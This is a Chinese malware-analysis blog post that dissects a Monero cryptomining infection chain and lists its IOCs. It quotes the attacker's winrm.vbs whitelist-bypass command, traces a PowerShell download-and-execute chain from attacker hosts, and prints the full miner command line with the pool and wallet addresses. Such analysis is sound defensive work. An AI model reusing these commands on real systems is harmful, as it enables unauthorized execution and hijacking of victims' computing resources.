首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >一个简单的挖矿病毒分析

一个简单的挖矿病毒分析

作者头像
信安之路
发布2018-11-30 09:40:32
2.9K0
发布2018-11-30 09:40:32
举报
文章被收录于专栏:信安之路信安之路

本文作者:信安之路病毒分析小组全体成员

样本概述

樣本信息:

CMD 命令行.txt,start.ps1,1.ps1,knbhm.jpg,svchost.exe

VirusTotal:

以下僅是 knbhm.jpg 的查詢結果

行为预览

详细分析

攻击者先通过调用 CMD 命令利用 winrm.vbs 来绕过白名单限制执行任意 XSL 代码,执行的命令行如下:

"C:\Users\Public\cscript.exe" //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

详情请参考:

https://www.freebuf.com/articles/system/178035.html

XSL 代码会执行一段 Powershell 命令,我们将其命名爲 start.ps1,

Base64 解密后

start.ps1 会向 http:##ps.nameapp.website 发起请求,并下载 1.ps1

1.ps1 會从 http:##ss.pumkkbx.website/knbhm.jpg 下載 knbhm.jpg,落到本地磁盘,并执行, knbhm.exe 作爲一个 Loader 会在临时目录下释放假的 svchost.exe,实际上是一个挖矿程序,并以特定的参数啓动,釋放完 svchost 后調用 CMD 進行自刪除,火绒剑监控行爲如下

knbhm.exe 只做了简单且并没有什麼技术含量的混淆

釋放的 svchost.exe 是经过 Zlib 压缩后存放在 knbhm.exe 的数据段中,在 knbhm.exe 运行过程中会进行對其解压缩:

地址偏移+0xC 處存放着右移一位后的文件大小,接着分配相应大小的空间进行解压缩,Zlib 版本號 1.1.3

之后调用 CreateProcess,啓动挖矿进程。

c:\Windows\temp\svchost.exe -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 47461u5xNSR9A727pZGhFZKpstAU35mfiZWvm6hzfKcEWDgJAc9sn3tDSJGPpA1MaqbgQ4wfv1PyuPAw7KVbHhF837QHdT9 -p x

挖门罗币,矿池地址:

pool.minexmr.com:80

钱包地址:

47461u5xNSR9A727pZGhFZKpstAU35mfiZWvm6hzfKcEWDgJAc9sn3tDSJGPpA1MaqbgQ4wfv1PyuPAw7KVbHhF837QHdT9

在门罗币官网上进行查询

這老哥剛開始挖……

IOC

URL:

http://ss[.]pumkkbx[.]website/knbhm[.]jpg http://ps[.]nameapp[.]website

SHA1:

3a50f2d49dc7261cafabda424273d7dd3d97703b 8647bf18b50098d8785214fcf557373407591ad9 559d409194d64a518c61e46a552011d42a075f5a

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-10-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 样本概述
  • 行为预览
  • 详细分析
  • IOC
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档